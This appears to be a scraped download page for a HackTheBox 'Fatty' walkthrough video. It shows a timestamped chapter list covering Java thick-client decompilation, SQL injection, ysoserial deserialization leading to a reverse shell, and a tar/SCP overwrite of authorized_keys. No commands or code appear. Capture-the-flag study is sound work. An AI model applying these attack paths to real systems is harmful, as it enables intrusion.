HackTheBox Fatty

>> DOWNLOAD LINK 🎞️ #1 <<

>> DOWNLOAD LINK 🎞️ #2 <<

>> COPY / PASTE LINK PLEASE 🎵 MP3 <<

>> YOUR LINK HERE: ___ http://youtube.com/watch?v=3bvKLj0akMM

00:00 - Intro • 02:10 - Using wget to recursively download files off an annonymous FTP Server • 06:00 - Attempting to execute the Java Thick Client, then switching to Java version 8 and trying again • 08:00 - Seeing the Thick Client makes some DNS Requests, make the DNS Request resolve and attempt to intercept with Burp • 11:00 - BurpSuite failed us, using SOCAT to forward the traffic and exploring the Thick Client features • 15:20 - Using CFR to decompile a Java JAR File then VS Studio Code to analyze the source • 20:40 - Downloading Eclipse and then configuring it to utilize Java 8 and creating a Hello World Java Application • 25:30 - Importing a Java JAR File into our Java Project then calling Login • 33:40 - Replicating the functionality to identify what Role we are, then other functions • 37:45 - Calling the Invoker Class to execute methods on the server • 42:50 - Attempting to call methods that the GUI prohibited us from • 45:30 - Using ShowFiles to see we can list files in our parent directory, then using Open to download files • 53:40 - Failing to download the fatty-server.jar file due to encoding issues • 58:40 - Unsealing the JAR File so we can edit the Invoker Class Object to fix our encoding issue by creating a binaryOpen function • 1:10:00 - Utilizing our new binaryOpen function to write to a file • 1:14:45 - Debugging a null pointer error, our binaryOpen function returned nothing! • 1:21:00 - Decompiling the downloaded fatty server and analyzing it to discover a SQL Injection and Deserialization vector • 1:28:50 - Playing with SQL Injections in the username to get an admin session • 1:40:00 - Modifying the ChangePW Function to allow us to send malicious payloads, then using ysoserial to generate a payload • 1:48:30 - Using CommonsCollections5 to generate a malicious payload to send and getting a reverse shell • 1:57:17 - Getting PsSpy on the box and discovering SCP is pulling files • 1:59:50 - Explaining what our exploit path is, having a tar overwrite itself and point to authorized_keys then the next time it is copied to it overwrites auth_key • 2:04:50 - Reverse shell returned, attempting to explain the exploit vector again

#############################